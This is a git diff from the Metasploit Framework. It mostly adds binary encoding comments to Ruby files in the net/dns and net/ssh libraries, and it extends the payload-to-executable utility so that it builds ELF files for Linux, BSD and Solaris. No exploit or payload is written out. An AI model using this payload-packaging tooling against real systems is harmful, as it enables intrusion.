diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 498610b721..5d6c0e509a 100755
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: exe.rb 14286 2011-11-20 01:41:04Z rapid7 $
##
@@ -1870,12 +1871,20 @@ End Sub
end
when 'elf'
- if (not arch or (arch.index(ARCH_X86)))
- output = Msf::Util::EXE.to_linux_x86_elf(framework, code, exeopts)
- end
-
- if (arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
- output = Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
+ if (not plat or (plat.index(Msf::Module::Platform::Linux)))
+ if (not arch or (arch.index(ARCH_X86)))
+ output = Msf::Util::EXE.to_linux_x86_elf(framework, code, exeopts)
+ elsif (arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
+ output = Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
+ end
+ elsif(plat and (plat.index(Msf::Module::Platform::BSD)))
+ if (not arch or (arch.index(ARCH_X86)))
+ output = Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts)
+ end
+ elsif(plat and (plat.index(Msf::Module::Platform::Solaris)))
+ if (not arch or (arch.index(ARCH_X86)))
+ output = Msf::Util::EXE.to_solaris_x86_elf(framework, code, exeopts)
+ end
end
when 'macho'
diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb
index ac41372ae4..ed084d9825 100644
--- a/lib/msf/util/svn.rb
+++ b/lib/msf/util/svn.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-util-svn
diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb
index 12bcdec3ea..94053f8e52 100644
--- a/lib/msf/windows_error.rb
+++ b/lib/msf/windows_error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/net/dns.rb b/lib/net/dns.rb
index 7b24483e98..3a7dddb7a0 100644
--- a/lib/net/dns.rb
+++ b/lib/net/dns.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require "net/dns/resolver"
diff --git a/lib/net/dns/dns.rb b/lib/net/dns/dns.rb
index 1214ea5bac..bb1bb05b8f 100644
--- a/lib/net/dns/dns.rb
+++ b/lib/net/dns/dns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# dns.rb
diff --git a/lib/net/dns/header.rb b/lib/net/dns/header.rb
index f927da8b76..66279c2f7e 100644
--- a/lib/net/dns/header.rb
+++ b/lib/net/dns/header.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#---
# $Id: Header.rb,v 1.5 2006/07/30 16:54:28 bluemonk Exp $
#+++
diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb
index 01937d0215..d65c8bf293 100644
--- a/lib/net/dns/names/names.rb
+++ b/lib/net/dns/names/names.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/dns/packet.rb b/lib/net/dns/packet.rb
index 280d3fecca..5938d252d4 100644
--- a/lib/net/dns/packet.rb
+++ b/lib/net/dns/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'logger'
require 'net/dns/names/names'
require 'net/dns/dns'
diff --git a/lib/net/dns/question.rb b/lib/net/dns/question.rb
index 9eb6158535..fb43e8af9b 100644
--- a/lib/net/dns/question.rb
+++ b/lib/net/dns/question.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#---
# $Id: Question.rb,v 1.8 2006/07/28 19:00:03 bluemonk Exp $
#+++
diff --git a/lib/net/dns/resolver.rb b/lib/net/dns/resolver.rb
index 402b7df173..6afb96489e 100644
--- a/lib/net/dns/resolver.rb
+++ b/lib/net/dns/resolver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# $Id: Resolver.rb,v 1.11 2006/07/30 16:55:35 bluemonk Exp $
#
diff --git a/lib/net/dns/resolver/socks.rb b/lib/net/dns/resolver/socks.rb
index e3d1edd373..35160e0bfd 100644
--- a/lib/net/dns/resolver/socks.rb
+++ b/lib/net/dns/resolver/socks.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'socket'
require 'ipaddr'
diff --git a/lib/net/dns/resolver/timeouts.rb b/lib/net/dns/resolver/timeouts.rb
index e0b4f1942a..e7523e478f 100644
--- a/lib/net/dns/resolver/timeouts.rb
+++ b/lib/net/dns/resolver/timeouts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
module SecondsHandle #:nodoc: all
diff --git a/lib/net/dns/rr.rb b/lib/net/dns/rr.rb
index e2d31ba1c8..1629c3f3a7 100644
--- a/lib/net/dns/rr.rb
+++ b/lib/net/dns/rr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# $Id: RR.rb,v 1.19 2006/07/28 07:33:36 bluemonk Exp $
#
diff --git a/lib/net/dns/rr/a.rb b/lib/net/dns/rr/a.rb
index 6481e0cba9..465ad45071 100644
--- a/lib/net/dns/rr/a.rb
+++ b/lib/net/dns/rr/a.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::A
diff --git a/lib/net/dns/rr/aaaa.rb b/lib/net/dns/rr/aaaa.rb
index 7f9d7486f9..7fc12ca1a6 100644
--- a/lib/net/dns/rr/aaaa.rb
+++ b/lib/net/dns/rr/aaaa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::AAAA
diff --git a/lib/net/dns/rr/classes.rb b/lib/net/dns/rr/classes.rb
index 25fd0c0486..9eb5ce478c 100644
--- a/lib/net/dns/rr/classes.rb
+++ b/lib/net/dns/rr/classes.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/dns/rr/cname.rb b/lib/net/dns/rr/cname.rb
index 12b9a1b655..63edeeb167 100644
--- a/lib/net/dns/rr/cname.rb
+++ b/lib/net/dns/rr/cname.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::CNAME
diff --git a/lib/net/dns/rr/hinfo.rb b/lib/net/dns/rr/hinfo.rb
index 6c8d080762..4de7f22524 100644
--- a/lib/net/dns/rr/hinfo.rb
+++ b/lib/net/dns/rr/hinfo.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::HINFO
diff --git a/lib/net/dns/rr/mr.rb b/lib/net/dns/rr/mr.rb
index f7abecf211..ccb5bbad3e 100644
--- a/lib/net/dns/rr/mr.rb
+++ b/lib/net/dns/rr/mr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::MR
diff --git a/lib/net/dns/rr/mx.rb b/lib/net/dns/rr/mx.rb
index 20f703dcc0..2463b5eb37 100644
--- a/lib/net/dns/rr/mx.rb
+++ b/lib/net/dns/rr/mx.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::MX
diff --git a/lib/net/dns/rr/ns.rb b/lib/net/dns/rr/ns.rb
index 253d6bb2f6..8be5079b03 100644
--- a/lib/net/dns/rr/ns.rb
+++ b/lib/net/dns/rr/ns.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::NS
diff --git a/lib/net/dns/rr/null.rb b/lib/net/dns/rr/null.rb
index 9890270d42..55a1574446 100644
--- a/lib/net/dns/rr/null.rb
+++ b/lib/net/dns/rr/null.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::NULL
diff --git a/lib/net/dns/rr/ptr.rb b/lib/net/dns/rr/ptr.rb
index f7e1787d82..694fea3297 100644
--- a/lib/net/dns/rr/ptr.rb
+++ b/lib/net/dns/rr/ptr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::PTR
diff --git a/lib/net/dns/rr/soa.rb b/lib/net/dns/rr/soa.rb
index b67344afcb..62b15c9e9e 100644
--- a/lib/net/dns/rr/soa.rb
+++ b/lib/net/dns/rr/soa.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::SOA
diff --git a/lib/net/dns/rr/srv.rb b/lib/net/dns/rr/srv.rb
index 35f2c2e737..41fe16c447 100644
--- a/lib/net/dns/rr/srv.rb
+++ b/lib/net/dns/rr/srv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::SRV
diff --git a/lib/net/dns/rr/txt.rb b/lib/net/dns/rr/txt.rb
index cbad5292c8..e2f6e1e84b 100644
--- a/lib/net/dns/rr/txt.rb
+++ b/lib/net/dns/rr/txt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
#
# Net::DNS::RR::TXT
diff --git a/lib/net/dns/rr/types.rb b/lib/net/dns/rr/types.rb
index 57f19a894e..cde8bb3632 100644
--- a/lib/net/dns/rr/types.rb
+++ b/lib/net/dns/rr/types.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net # :nodoc:
module DNS
diff --git a/lib/net/ssh.rb b/lib/net/ssh.rb
index e6fc134ce1..2c98142cf4 100644
--- a/lib/net/ssh.rb
+++ b/lib/net/ssh.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
# Make sure HOME is set, regardless of OS, so that File.expand_path works
diff --git a/lib/net/ssh.rb.ut.rb b/lib/net/ssh.rb.ut.rb
index 2cc9c338c2..e3884e81a9 100755
--- a/lib/net/ssh.rb.ut.rb
+++ b/lib/net/ssh.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'net/ssh'
diff --git a/lib/net/ssh/authentication/agent.rb b/lib/net/ssh/authentication/agent.rb
index a30279a8a1..8193991437 100644
--- a/lib/net/ssh/authentication/agent.rb
+++ b/lib/net/ssh/authentication/agent.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/constants.rb b/lib/net/ssh/authentication/constants.rb
index 067e9cd44f..387c78fca7 100644
--- a/lib/net/ssh/authentication/constants.rb
+++ b/lib/net/ssh/authentication/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Authentication
# Describes the constants used by the Net::SSH::Authentication components
diff --git a/lib/net/ssh/authentication/key_manager.rb b/lib/net/ssh/authentication/key_manager.rb
index eba17cfc76..6e3541c7d5 100644
--- a/lib/net/ssh/authentication/key_manager.rb
+++ b/lib/net/ssh/authentication/key_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/key_factory'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/methods/abstract.rb b/lib/net/ssh/authentication/methods/abstract.rb
index 34f2ffe6a8..794d75bf2d 100644
--- a/lib/net/ssh/authentication/methods/abstract.rb
+++ b/lib/net/ssh/authentication/methods/abstract.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/authentication/methods/hostbased.rb b/lib/net/ssh/authentication/methods/hostbased.rb
index 43c3eac8fb..908fe179ea 100644
--- a/lib/net/ssh/authentication/methods/hostbased.rb
+++ b/lib/net/ssh/authentication/methods/hostbased.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/authentication/methods/abstract'
module Net
diff --git a/lib/net/ssh/authentication/methods/keyboard_interactive.rb b/lib/net/ssh/authentication/methods/keyboard_interactive.rb
index 47864ca378..073edc1538 100644
--- a/lib/net/ssh/authentication/methods/keyboard_interactive.rb
+++ b/lib/net/ssh/authentication/methods/keyboard_interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/prompt'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/methods/password.rb b/lib/net/ssh/authentication/methods/password.rb
index ade4695e72..a04e1c8563 100644
--- a/lib/net/ssh/authentication/methods/password.rb
+++ b/lib/net/ssh/authentication/methods/password.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/methods/publickey.rb b/lib/net/ssh/authentication/methods/publickey.rb
index e5eafebbba..8bb47a4adf 100644
--- a/lib/net/ssh/authentication/methods/publickey.rb
+++ b/lib/net/ssh/authentication/methods/publickey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/authentication/methods/abstract'
diff --git a/lib/net/ssh/authentication/pageant.rb b/lib/net/ssh/authentication/pageant.rb
index 871e86b1c1..4ff4d93ca7 100644
--- a/lib/net/ssh/authentication/pageant.rb
+++ b/lib/net/ssh/authentication/pageant.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'dl/import'
require 'dl/struct'
diff --git a/lib/net/ssh/authentication/session.rb b/lib/net/ssh/authentication/session.rb
index b471b54377..0df46444b8 100644
--- a/lib/net/ssh/authentication/session.rb
+++ b/lib/net/ssh/authentication/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/transport/constants'
require 'net/ssh/authentication/constants'
diff --git a/lib/net/ssh/buffer.rb b/lib/net/ssh/buffer.rb
index d74244b219..9c6a199a68 100644
--- a/lib/net/ssh/buffer.rb
+++ b/lib/net/ssh/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/ruby_compat'
require 'net/ssh/transport/openssl'
diff --git a/lib/net/ssh/buffered_io.rb b/lib/net/ssh/buffered_io.rb
index c92db678c5..c51e775de7 100644
--- a/lib/net/ssh/buffered_io.rb
+++ b/lib/net/ssh/buffered_io.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb
index f749b1e809..6514744111 100644
--- a/lib/net/ssh/command_stream.rb
+++ b/lib/net/ssh/command_stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
module Net
diff --git a/lib/net/ssh/config.rb b/lib/net/ssh/config.rb
index 27ebb19bcc..c518cf1b98 100644
--- a/lib/net/ssh/config.rb
+++ b/lib/net/ssh/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# The Net::SSH::Config class is used to parse OpenSSH configuration files,
diff --git a/lib/net/ssh/connection/channel.rb b/lib/net/ssh/connection/channel.rb
index 6bf7434158..cd6044fad9 100644
--- a/lib/net/ssh/connection/channel.rb
+++ b/lib/net/ssh/connection/channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/connection/constants'
require 'net/ssh/connection/term'
diff --git a/lib/net/ssh/connection/constants.rb b/lib/net/ssh/connection/constants.rb
index 0b7711806b..fa23803feb 100644
--- a/lib/net/ssh/connection/constants.rb
+++ b/lib/net/ssh/connection/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Connection
# Definitions of constants that are specific to the connection layer of the
diff --git a/lib/net/ssh/connection/session.rb b/lib/net/ssh/connection/session.rb
index 93c2e2b49e..d63a77ae58 100644
--- a/lib/net/ssh/connection/session.rb
+++ b/lib/net/ssh/connection/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
require 'net/ssh/connection/channel'
require 'net/ssh/connection/constants'
diff --git a/lib/net/ssh/connection/term.rb b/lib/net/ssh/connection/term.rb
index 3e1caa5d0c..efecea7124 100644
--- a/lib/net/ssh/connection/term.rb
+++ b/lib/net/ssh/connection/term.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Connection
# These constants are used when requesting a pseudo-terminal (via
diff --git a/lib/net/ssh/errors.rb b/lib/net/ssh/errors.rb
index 219be404c6..009f896ea3 100644
--- a/lib/net/ssh/errors.rb
+++ b/lib/net/ssh/errors.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A general exception class, to act as the ancestor of all other Net::SSH
# exception classes.
diff --git a/lib/net/ssh/key_factory.rb b/lib/net/ssh/key_factory.rb
index 6c2f1c3841..e416e622c6 100644
--- a/lib/net/ssh/key_factory.rb
+++ b/lib/net/ssh/key_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/openssl'
require 'net/ssh/prompt'
diff --git a/lib/net/ssh/known_hosts.rb b/lib/net/ssh/known_hosts.rb
index 3722745c12..4e251aa319 100644
--- a/lib/net/ssh/known_hosts.rb
+++ b/lib/net/ssh/known_hosts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'strscan'
require 'net/ssh/buffer'
diff --git a/lib/net/ssh/loggable.rb b/lib/net/ssh/loggable.rb
index a1de96a976..4acf8b6edd 100644
--- a/lib/net/ssh/loggable.rb
+++ b/lib/net/ssh/loggable.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A simple module to make logging easier to deal with. It assumes that the
diff --git a/lib/net/ssh/packet.rb b/lib/net/ssh/packet.rb
index a54c00530c..54b3d477ff 100644
--- a/lib/net/ssh/packet.rb
+++ b/lib/net/ssh/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/transport/constants'
require 'net/ssh/authentication/constants'
diff --git a/lib/net/ssh/prompt.rb b/lib/net/ssh/prompt.rb
index 8ca2a12e8e..abf0409333 100644
--- a/lib/net/ssh/prompt.rb
+++ b/lib/net/ssh/prompt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A basic prompt module that can be mixed into other objects. If HighLine is
diff --git a/lib/net/ssh/proxy/errors.rb b/lib/net/ssh/proxy/errors.rb
index 6eb3501a93..7decc82596 100644
--- a/lib/net/ssh/proxy/errors.rb
+++ b/lib/net/ssh/proxy/errors.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
module Net; module SSH; module Proxy
diff --git a/lib/net/ssh/proxy/http.rb b/lib/net/ssh/proxy/http.rb
index 1131601870..f36727c28e 100644
--- a/lib/net/ssh/proxy/http.rb
+++ b/lib/net/ssh/proxy/http.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'net/ssh/proxy/errors'
diff --git a/lib/net/ssh/proxy/socks4.rb b/lib/net/ssh/proxy/socks4.rb
index ec04f84054..4dd2fd0794 100644
--- a/lib/net/ssh/proxy/socks4.rb
+++ b/lib/net/ssh/proxy/socks4.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'resolv'
require 'ipaddr'
diff --git a/lib/net/ssh/proxy/socks5.rb b/lib/net/ssh/proxy/socks5.rb
index 1c9b4a6491..adb0ae0efa 100644
--- a/lib/net/ssh/proxy/socks5.rb
+++ b/lib/net/ssh/proxy/socks5.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'net/ssh/ruby_compat'
require 'net/ssh/proxy/errors'
diff --git a/lib/net/ssh/ruby_compat.rb b/lib/net/ssh/ruby_compat.rb
index 90a96470cc..a1092f1d65 100644
--- a/lib/net/ssh/ruby_compat.rb
+++ b/lib/net/ssh/ruby_compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class String
if RUBY_VERSION < "1.9"
def getbyte(index)
diff --git a/lib/net/ssh/service/forward.rb b/lib/net/ssh/service/forward.rb
index 234c358668..52e87efea3 100644
--- a/lib/net/ssh/service/forward.rb
+++ b/lib/net/ssh/service/forward.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/loggable'
module Net; module SSH; module Service
diff --git a/lib/net/ssh/test.rb b/lib/net/ssh/test.rb
index be76150c8f..11cfd31aac 100644
--- a/lib/net/ssh/test.rb
+++ b/lib/net/ssh/test.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/session'
require 'net/ssh/connection/session'
require 'net/ssh/test/kex'
diff --git a/lib/net/ssh/test/channel.rb b/lib/net/ssh/test/channel.rb
index 5efbe8b489..8483550628 100644
--- a/lib/net/ssh/test/channel.rb
+++ b/lib/net/ssh/test/channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Test
# A mock channel, used for scripting actions in tests. It wraps a
diff --git a/lib/net/ssh/test/extensions.rb b/lib/net/ssh/test/extensions.rb
index e19a986369..af085af2d0 100644
--- a/lib/net/ssh/test/extensions.rb
+++ b/lib/net/ssh/test/extensions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/packet'
require 'net/ssh/buffered_io'
diff --git a/lib/net/ssh/test/kex.rb b/lib/net/ssh/test/kex.rb
index 9e34e42c47..bdef643fd8 100644
--- a/lib/net/ssh/test/kex.rb
+++ b/lib/net/ssh/test/kex.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/errors'
diff --git a/lib/net/ssh/test/local_packet.rb b/lib/net/ssh/test/local_packet.rb
index a2ef470270..b1555527cc 100644
--- a/lib/net/ssh/test/local_packet.rb
+++ b/lib/net/ssh/test/local_packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/packet'
require 'net/ssh/test/packet'
diff --git a/lib/net/ssh/test/packet.rb b/lib/net/ssh/test/packet.rb
index 7b838a64ad..c3eeff9030 100644
--- a/lib/net/ssh/test/packet.rb
+++ b/lib/net/ssh/test/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/connection/constants'
require 'net/ssh/transport/constants'
diff --git a/lib/net/ssh/test/remote_packet.rb b/lib/net/ssh/test/remote_packet.rb
index cd89b22b27..844d4ac6fd 100644
--- a/lib/net/ssh/test/remote_packet.rb
+++ b/lib/net/ssh/test/remote_packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/test/packet'
diff --git a/lib/net/ssh/test/script.rb b/lib/net/ssh/test/script.rb
index 58796ccdaf..6fec8930f8 100644
--- a/lib/net/ssh/test/script.rb
+++ b/lib/net/ssh/test/script.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/test/channel'
require 'net/ssh/test/local_packet'
require 'net/ssh/test/remote_packet'
diff --git a/lib/net/ssh/test/socket.rb b/lib/net/ssh/test/socket.rb
index 62a26dbfcb..5356731d4f 100644
--- a/lib/net/ssh/test/socket.rb
+++ b/lib/net/ssh/test/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'stringio'
require 'net/ssh/test/extensions'
diff --git a/lib/net/ssh/transport/algorithms.rb b/lib/net/ssh/transport/algorithms.rb
index ecf39fdaa0..cef241f6ca 100644
--- a/lib/net/ssh/transport/algorithms.rb
+++ b/lib/net/ssh/transport/algorithms.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/known_hosts'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/transport/cipher_factory.rb b/lib/net/ssh/transport/cipher_factory.rb
index fc648291a5..2946aa0314 100644
--- a/lib/net/ssh/transport/cipher_factory.rb
+++ b/lib/net/ssh/transport/cipher_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/transport/identity_cipher'
diff --git a/lib/net/ssh/transport/constants.rb b/lib/net/ssh/transport/constants.rb
index 23c2859a1b..ba450dd98a 100644
--- a/lib/net/ssh/transport/constants.rb
+++ b/lib/net/ssh/transport/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Transport
module Constants
diff --git a/lib/net/ssh/transport/hmac.rb b/lib/net/ssh/transport/hmac.rb
index e57924cfd7..9721475ba6 100644
--- a/lib/net/ssh/transport/hmac.rb
+++ b/lib/net/ssh/transport/hmac.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/md5'
require 'net/ssh/transport/hmac/md5_96'
require 'net/ssh/transport/hmac/sha1'
diff --git a/lib/net/ssh/transport/hmac/abstract.rb b/lib/net/ssh/transport/hmac/abstract.rb
index cfbb33795e..1020070394 100644
--- a/lib/net/ssh/transport/hmac/abstract.rb
+++ b/lib/net/ssh/transport/hmac/abstract.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
module Net; module SSH; module Transport; module HMAC
diff --git a/lib/net/ssh/transport/hmac/md5.rb b/lib/net/ssh/transport/hmac/md5.rb
index 66b78ca42e..59bd034846 100644
--- a/lib/net/ssh/transport/hmac/md5.rb
+++ b/lib/net/ssh/transport/hmac/md5.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/md5_96.rb b/lib/net/ssh/transport/hmac/md5_96.rb
index 826b70a0d0..8759b70ff0 100644
--- a/lib/net/ssh/transport/hmac/md5_96.rb
+++ b/lib/net/ssh/transport/hmac/md5_96.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/md5'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/none.rb b/lib/net/ssh/transport/hmac/none.rb
index 191373e873..cad4af51c1 100644
--- a/lib/net/ssh/transport/hmac/none.rb
+++ b/lib/net/ssh/transport/hmac/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/sha1.rb b/lib/net/ssh/transport/hmac/sha1.rb
index b40d32fe91..d1fdecc7a5 100644
--- a/lib/net/ssh/transport/hmac/sha1.rb
+++ b/lib/net/ssh/transport/hmac/sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/abstract'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/hmac/sha1_96.rb b/lib/net/ssh/transport/hmac/sha1_96.rb
index 6b0b3c282e..d04e2e20e9 100644
--- a/lib/net/ssh/transport/hmac/sha1_96.rb
+++ b/lib/net/ssh/transport/hmac/sha1_96.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/hmac/sha1'
module Net::SSH::Transport::HMAC
diff --git a/lib/net/ssh/transport/identity_cipher.rb b/lib/net/ssh/transport/identity_cipher.rb
index 856c2ed667..0a0b4034a5 100644
--- a/lib/net/ssh/transport/identity_cipher.rb
+++ b/lib/net/ssh/transport/identity_cipher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Transport
# A cipher that does nothing but pass the data through, unchanged. This
diff --git a/lib/net/ssh/transport/kex.rb b/lib/net/ssh/transport/kex.rb
index b38a46f27b..23f55df9c7 100644
--- a/lib/net/ssh/transport/kex.rb
+++ b/lib/net/ssh/transport/kex.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/transport/kex/diffie_hellman_group1_sha1'
require 'net/ssh/transport/kex/diffie_hellman_group_exchange_sha1'
diff --git a/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb b/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
index a9875ac495..2ea524d0b4 100644
--- a/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
+++ b/lib/net/ssh/transport/kex/diffie_hellman_group1_sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffer'
require 'net/ssh/errors'
require 'net/ssh/loggable'
diff --git a/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb b/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
index bf12863afb..0764304279 100644
--- a/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
+++ b/lib/net/ssh/transport/kex/diffie_hellman_group_exchange_sha1.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/transport/constants'
require 'net/ssh/transport/kex/diffie_hellman_group1_sha1'
diff --git a/lib/net/ssh/transport/openssl.rb b/lib/net/ssh/transport/openssl.rb
index 03036ec95c..cd07e41c67 100644
--- a/lib/net/ssh/transport/openssl.rb
+++ b/lib/net/ssh/transport/openssl.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'net/ssh/buffer'
diff --git a/lib/net/ssh/transport/packet_stream.rb b/lib/net/ssh/transport/packet_stream.rb
index 9c18768bf0..39f593c470 100644
--- a/lib/net/ssh/transport/packet_stream.rb
+++ b/lib/net/ssh/transport/packet_stream.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/buffered_io'
require 'net/ssh/errors'
require 'net/ssh/packet'
diff --git a/lib/net/ssh/transport/server_version.rb b/lib/net/ssh/transport/server_version.rb
